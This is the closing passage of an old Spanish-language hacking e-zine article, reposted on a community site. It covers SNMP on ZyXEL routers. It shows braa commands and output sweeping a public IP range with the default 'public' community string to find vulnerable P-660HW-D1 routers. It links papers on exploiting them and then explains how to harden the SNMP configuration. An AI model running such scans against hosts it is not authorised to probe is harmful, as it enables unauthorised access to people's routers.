88.22.xyz.154:104ms:.1.3.6.1.4.1.890.1.2.6.60:Error [2] No such name. 
88.22.xyz.153:108ms:.1.3.6.1.4.1.890.1.2.6.60:Error [2] No such name. 
88.22.xyz.150:104ms:.1.3.6.1.4.1.890.1.2.6.60:Error [2] No such name. 
88.22.xyz.139:104ms:.1.3.6.1.4.1.890.1.2.6.60:Error [2] No such name. 
88.22.xyz.135:100ms:.1.3.6.1.4.1.890.1.2.6.60:Error [2] No such name. 
88.22.xyz.133:104ms:.1.3.6.1.4.1.890.1.2.6.60:Error [2] No such name. 
88.22.xyz.109:104ms:.1.3.6.1.4.1.890.1.2.6.60:Error [2] No such name. 
88.22.xyz.106:100ms:.1.3.6.1.4.1.890.1.2.6.60:Error [2] No such name. 
88.22.xyz.100:104ms:.1.3.6.1.4.1.890.1.2.6.60:Error [2] No such name. 
bt ~ #                                                                

 
 * Ahora todos los P-660HW-D1 

bt ~ # braa public@88.22.xyz.100-88.22.xyz.254:161:.1.3.6.1.4.1.890.1.2.6.34 
88.22.xyz.244:100ms:.1.3.6.1.4.1.890.1.2.6.34:Error [2] No such name. 
88.22.xyz.236:88ms:.1.3.6.1.4.1.890.1.2.6.34:Error [2] No such name. 
88.22.xyz.231:104ms:.1.3.6.1.4.1.890.1.2.6.34:Error [2] No such name. 
88.22.xyz.229:100ms:.1.3.6.1.4.1.890.1.2.6.34:Error [2] No such name. 
88.22.xyz.226:104ms:.1.3.6.1.4.1.890.1.2.6.34:Error [2] No such name. 
88.22.xyz.205:108ms:.1.3.6.1.4.1.890.1.2.6.34:Error [2] No such name. 
88.22.xyz.198:100ms:.1.3.6.1.4.1.890.1.2.6.34:Error [2] No such name. 
88.22.xyz.194:100ms:.1.3.6.1.4.1.890.1.2.6.34:Error [2] No such name. 
88.22.xyz.168:104ms:.1.3.6.1.4.1.890.1.2.6.34:Error [2] No such name. 
88.22.xyz.160:104ms:.1.3.6.1.4.1.890.1.2.6.34:Error [2] No such name. 
88.22.xyz.154:108ms:.1.3.6.1.4.1.890.1.2.6.34:Error [2] No such name. 
88.22.xyz.153:108ms:.1.3.6.1.4.1.890.1.2.6.34:Error [2] No such name. 
88.22.xyz.150:104ms:.1.3.6.1.4.1.890.1.2.6.34:Error [2] No such name. 
88.22.xyz.139:100ms:.1.3.6.1.4.1.890.1.2.6.34:Error [2] No such name. 
88.22.xyz.135:104ms:.1.3.6.1.4.1.890.1.2.6.34:Error [2] No such name. 
88.22.xyz.133:108ms:.1.3.6.1.4.1.890.1.2.6.34:Error [2] No such name. 
88.22.xyz.109:104ms:.1.3.6.1.4.1.890.1.2.6.34:Error [2] No such name. 
88.22.xyz.106:96ms:.1.3.6.1.4.1.890.1.2.6.34:Error [2] No such name. 
88.22.xyz.100:104ms:.1.3.6.1.4.1.890.1.2.6.34:Error [2] No such name. 
bt ~ #    

 
 * Adrian Pastor de GNUCITIZEN (www.gnucitizen.org) publico unos "papers" 
   haciendo publicas estas y otras vulnerabilidades de los routers ZyXEL. 
   Entre otras delicias, explica como hacer ataques de inyeccion de scripts 
   usando SNMP, sacar claves DynDNS, usar el router para hacer wardriving, 
   etc, etc. 

     -> http://www.packetstormsecurity.org/papers/attack/Hacking_ZyXEL_ 
        Gateways.pdf 
     -> http://www.gnucitizen.org/static/blog/2008/04/hacking_zyxel_gateways_ 
        part_2.pdf 

 * Para los mas avanzados, os recomiendo que investigueis sobre el SNMP walking: 
       
     -> http://www.cuddletech.com/articles/snmp/node13.html 

 

[=][=][=][=][=][=][=] 
[  HACKERs BUENOS   ] 
[=][=][=][=][=][=][=] 

 
 * Vamos a ver como corregir la vulnerabilidad o disconfiguracion, como lo 
   querais llamar. 
 * En el menu principal via telnet podemos acceder a: 

22. SNMP Configuration 

  *  Nos aparece esto 

 
                          Menu 22 - SNMP Configuration 

                  SNMP: 
                    Get Community= public 
                    Set Community= public 
                    Trusted Host= 0.0.0.0 
                    Trap: 
                      Community= public 
                      Destination= 0.0.0.0 

 
                    Press ENTER to Confirm or ESC to Cancel: 

 * Deberiamos cambiar la password GET y SET por algo menos obvio. 
 * Ademas podemos asignar como Trusted Host a algun PC de la LAN interna 
   para que solo este PC (con la IP que especifiquemos pueda obtener/modificar 
   valores usando SNMP. 
 * Trap: Si configuramos una ip destino, el router enviara a este destino 
   informacion de gestion relativa a interfaces, velocidad, etc. Podemos 
   usar MRTG para recolectar informacion. Por supuesto hay que cambiar la 
   Community!!! 

 

[=][=][=][=][=][=][=][=] 
[  CONCLUSIoN Y CIERRE ] 
[=][=][=][=][=][=][=][=] 

 * El protocolo SNMP es muy versatil para la gestion de las redes. Sobre todo 
   cuando alcanza un area muy extensa. Las impresoras de red lo traen siempre  
   activado por defecto. 

 * El software de MRTG es un ejemplo de potencia de gestion SNMP. 

 * No debemos fiarnos nunca de las configuraciones por defecto. 

 * Hay que investigar, experimentar y publicar para que el hacking, perdon, el 
   conocimiento siga vivo, gratuito y libre. 

 
*EOF*

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Francesco's profile picture
Francesco Arca (@Francesco)
24 Apr 2024
A closer view of the "face"
DrWatson's profile picture
@DrWatson
24 Apr 2024
The face was clearly crafted by the ancient people of Atlantis!
guest's profile picture
@guest
24 Apr 2024
cool
guest's profile picture
@guest
24 Apr 2024
I played quake a lot. Was my favorite game.
guest's profile picture
@guest
23 Apr 2024
Underground eXperts United was the ezine! Jelt enkelt det bästa ezine någonsin!
guest's profile picture
@guest
23 Apr 2024
Pokemon was my favorite game
AniphaeS's profile picture
@AniphaeS
22 Apr 2024
Sembra deliziosa! Da provare!
AniphaeS's profile picture
@AniphaeS
22 Apr 2024
e' stato un bel concerto!
gigiLock's profile picture
@gigiLock
22 Apr 2024
i dunno speak Spanish
gigiLock's profile picture
@gigiLock
22 Apr 2024
how was dating dating 7th-6th century BC calculated?
a Francesco Arca production 2016 - 2024
Terms of Service - Privacy Policy
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT